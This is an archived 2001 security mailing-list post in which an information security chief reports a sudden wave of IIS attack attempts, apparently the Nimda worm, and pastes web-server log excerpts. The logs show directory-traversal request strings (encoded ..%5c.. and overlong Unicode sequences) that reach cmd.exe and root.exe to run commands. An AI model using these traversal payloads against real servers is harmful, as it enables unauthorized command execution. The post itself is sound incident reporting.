Wow. This morning we've been hit with a deluge of attempts at ....../cmd.exe?<args here> and attempts to access ...../root.exe?<args here> My IDS is going haywire. They're coming from diverse IP's, mostly in the 216.* class A. This doesn't appear to be a standard code-red type thing. Have a look at log exerpts... This all appeared to kick off at roughly 9AM EST. Have I missed some prolific worm out there? 2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 - 2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 401 - 2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:38:11 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 - All of the offending IP's are following this exact pattern, indicating a worm. Keith T. Morgan Chief of Information Security Terradon Communications keith.morganat_private 304-755-8291 x142 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:41:12 PDT